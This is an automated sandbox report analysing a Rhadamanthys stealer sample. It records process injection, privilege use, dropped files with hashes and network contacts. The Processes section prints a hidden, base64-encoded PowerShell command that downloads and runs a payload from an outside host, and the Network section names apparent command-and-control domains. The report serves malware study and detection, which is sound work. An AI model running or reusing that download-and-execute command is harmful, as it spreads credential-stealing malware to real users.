Malware Analysis Report

2024-11-30 02:10

Sample ID 240329-jzdtfadf77
Target setup.zip
SHA256 b2045d805874c29a618be48bec7b68b3eab23cb4a42464d3d64327a621134dbb
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b2045d805874c29a618be48bec7b68b3eab23cb4a42464d3d64327a621134dbb

Threat Level: Known bad

The file setup.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Executes dropped EXE

Drops file in Windows directory

Loads dropped DLL

Program crash

Unsigned PE

Suspicious use of UnmapMainImage

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 08:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 08:06

Reported

2024-03-29 08:08

Platform

win10v2004-20240226-en

Max time kernel

91s

Max time network

97s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1792 created 2420 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1280 set thread context of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e576b1e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6BE9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6F36.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7003.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e576b1e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6FD3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI70EF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI70CF.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{40687992-D47D-43B1-8A2C-57D30E7D9D88} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9272.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e576b22.msi C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3308 wrote to memory of 4424 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3308 wrote to memory of 4424 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3308 wrote to memory of 4424 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4424 wrote to memory of 440 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 440 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 440 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3308 wrote to memory of 1280 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3308 wrote to memory of 1280 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 3308 wrote to memory of 1280 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1280 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 1792 wrote to memory of 4988 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 4988 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 1108 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe
PID 1792 wrote to memory of 1108 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe
PID 1792 wrote to memory of 916 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\rundll32.exe
PID 1792 wrote to memory of 916 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\rundll32.exe
PID 1792 wrote to memory of 916 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\rundll32.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe
PID 1792 wrote to memory of 2160 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\dialer.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 61AD839F34300B4D3AF3AA2949DBD0A1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss716A.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7167.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7168.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7169.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYwB1AHIAbABoAHUAYgAuAG0AbwBuAHMAdABlAHIALwBuAGUAdwBkAHIAbwBwAC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA

C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\TnidhJHVeb9CHno\svchost.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32 "C:\Users\Admin\AppData\Local\Temp\L0F8JTNzuAJ3vfq\svchost.dll", PluginInit

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2180

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 2188

Network

Country Destination Domain Proto
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 40.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 thecurl.monster udp
US 104.21.31.116:80 thecurl.monster tcp
US 104.21.31.116:443 thecurl.monster tcp
US 8.8.8.8:53 116.31.21.104.in-addr.arpa udp
US 8.8.8.8:53 death1488.com udp
US 172.67.151.174:80 death1488.com tcp
US 8.8.8.8:53 174.151.67.172.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 the.earth.li udp
GB 93.93.131.124:443 the.earth.li tcp
US 8.8.8.8:53 124.131.93.93.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 26.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 curlhub.monster udp
US 172.67.204.219:443 curlhub.monster tcp
US 8.8.8.8:53 219.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 ot4.pw udp
US 104.21.5.62:443 ot4.pw tcp
US 8.8.8.8:53 62.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 35.206.58.216.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 104.21.68.134:80 raur94.com tcp
US 104.21.68.134:443 raur94.com tcp
US 8.8.8.8:53 134.68.21.104.in-addr.arpa udp
US 8.8.8.8:53 checkass.monster udp
US 104.21.2.229:443 checkass.monster tcp
US 8.8.8.8:53 229.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 152.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Windows\Installer\MSI6BE9.tmp

MD5 b158d8d605571ea47a238df5ab43dfaa
SHA1 bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256 ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA512 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

C:\Windows\Installer\MSI70EF.tmp

MD5 fb4665320c9da54598321c59cc5ed623
SHA1 89e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA256 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512 b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

memory/440-28-0x0000000004710000-0x0000000004746000-memory.dmp

memory/440-29-0x0000000072800000-0x0000000072FB0000-memory.dmp

memory/440-30-0x0000000004860000-0x0000000004870000-memory.dmp

memory/440-31-0x0000000004EA0000-0x00000000054C8000-memory.dmp

memory/440-32-0x0000000004CE0000-0x0000000004D02000-memory.dmp

memory/440-33-0x00000000055D0000-0x0000000005636000-memory.dmp

memory/440-34-0x0000000005640000-0x00000000056A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkpvpgh4.1bj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/440-44-0x00000000057B0000-0x0000000005B04000-memory.dmp

memory/440-45-0x0000000005CA0000-0x0000000005CBE000-memory.dmp

memory/440-46-0x0000000005CE0000-0x0000000005D2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss716A.ps1

MD5 30c30ef2cb47e35101d13402b5661179
SHA1 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

memory/440-48-0x0000000004860000-0x0000000004870000-memory.dmp

memory/440-49-0x0000000007610000-0x0000000007C8A000-memory.dmp

memory/440-50-0x0000000006200000-0x000000000621A000-memory.dmp

memory/440-51-0x0000000006F90000-0x0000000007026000-memory.dmp

memory/440-52-0x0000000006E60000-0x0000000006E82000-memory.dmp

memory/440-53-0x0000000007C90000-0x0000000008234000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scr7168.ps1

MD5 753240f3d0c58563dcba1244db69b0d7
SHA1 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256 e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

memory/440-55-0x0000000008240000-0x0000000008402000-memory.dmp

memory/440-56-0x0000000008940000-0x0000000008E6C000-memory.dmp

memory/440-60-0x0000000072800000-0x0000000072FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msi7167.txt

MD5 eb0046beb949b23b97dccd59c4b8f131
SHA1 c084a9c15a323cd51d24122681a494e52577487f
SHA256 b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA512 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

C:\Config.Msi\e576b21.rbs

MD5 621b77a696cb430dc1fd63e4ee87cd37
SHA1 7ce7bc170d88d3d0008d1cb6c50e93d5289f08aa
SHA256 1a29bb7d549659425827278b9a5bb9f68723836809ed3c5726e8f5e6b332710a
SHA512 ae2673d9c107130487e8bd2397b47d6cbfa03b5e1b02340e6d44aabab354938a0f5f618fc1f7bbcca3ec8c3d70d63e07c6c9c576767c7ef3104da3ee414b7e92

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

MD5 35365d3713500bde4e2e1422c54f04fa
SHA1 0b24b1de060caa7be51404d82da5fef05958a1da
SHA256 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA512 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

C:\Windows\Installer\e576b1e.msi

MD5 86a68878633d570e195609fe33640561
SHA1 5a5355a80750693493c4ff9d4184d3234ad62b73
SHA256 7a5d8ef1b6de2d300a6a3118426562e881577c85ab2d919f0337e4de0e9aaa92
SHA512 502f996aff0273aecd4256bd25b3bcd2187a2b44c1b26c0b64a622ae2d788328d8f8e9bbd8fa9119a0edb282d1737f8f502ecf69484a70b14fd287442630c1a9

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll

MD5 a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1 a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256 e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512 b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll

MD5 0381964390751461a5d79d26ca7cedaa
SHA1 3b17b9dca5060f9b22920737165a6bd1de5e8941
SHA256 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da
SHA512 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll

MD5 8f4cdaed2399204619310cd76fd11056
SHA1 0f06ef5acde4f1e99a12cfc8489c1163dba910d1
SHA256 df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213
SHA512 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll

MD5 b7b148054a2818699d93f96139b4d0d0
SHA1 0a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA256 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA512 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

MD5 f74e6b15bbb4d3a8decb9fe17175d056
SHA1 20a67c7d020bce3adcbd34cb0044771ae0bcb2ba
SHA256 50235ec9328d759d9adceb1224999bcf5d602594b2c6260c4f793b84c533e6d3
